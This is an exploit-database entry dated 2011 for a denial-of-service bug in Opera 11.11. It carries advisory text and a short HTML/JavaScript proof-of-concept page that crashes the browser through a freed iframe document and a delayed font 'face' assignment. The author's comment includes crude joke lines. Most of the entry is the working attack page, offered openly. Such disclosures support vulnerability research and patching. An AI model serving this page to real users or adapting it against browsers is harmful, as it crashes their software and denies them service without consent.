Opera Web Browser 11.11 - Denial of Service
Author: echo
type: dos
platform: multiple
port:
date_added: 2011-06-14
date_updated: 2015-01-21
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/48262/info
The Opera Web Browser is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Opera Web Browser 11.11 is vulnerable; other versions may also be affected.
<html>
<body>
<iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>
<script type="text/javascript" language="javascript">
/*
*
* Opera 11.11 Remote Crash
* Software link: http://www.opera.com/download/
* Tested on: Win32 xp home sp 3
* CVE : null
*
* Im too lazy to deep analyze this ,but i thing is just unexploitable crash
* so f****jixvt
* ( dla klechis�awa i jego kosiarki :i )
*
*/
var a = window.document.getElementById('bo0om');
var b = a.contentDocument.createElement('font');
a.src='about:blank';
setTimeout('b.face = "h3h";',500);
</script>
</body>
</html>